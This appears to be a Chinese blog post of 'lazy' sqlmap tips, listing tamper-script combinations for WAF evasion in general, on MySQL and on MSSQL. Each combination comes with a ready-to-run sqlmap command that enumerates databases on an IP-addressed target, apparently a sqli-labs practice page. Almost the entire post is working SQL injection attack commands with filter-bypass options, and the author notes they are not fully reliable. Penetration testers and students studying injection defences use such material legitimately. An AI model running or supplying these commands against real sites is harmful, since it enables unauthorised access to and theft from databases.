sqlmap tamper懒人使用技巧

sqlmap tamper懒人使用技巧

测试了下,不是太靠谱,大家可以根据实际情况测试一下

普通绕过
tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,percentage,randomcase,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,percentage,randomcase,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --proxy="http://127.0.0.1:8080" -batch

MySQL数据库一把索绕过
tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,percentage,randomcase,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,percentage,randomcase,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor --proxy="http://127.0.0.1:8080" -batch

MSSQL数据库一把索绕过
tamper=between,charencode,charunicodeencode,greatest,multiplespaces,percentage,randomcase,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper=between,charencode,charunicodeencode,greatest,multiplespaces,percentage,randomcase,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --proxy="http://127.0.0.1:8080" -batch

sqlmap tamper懒人使用技巧

上一篇:sqlserver 查找某个字段在哪些表里


下一篇:Centos服务器和redis和nginx和mysql基础安全加固处理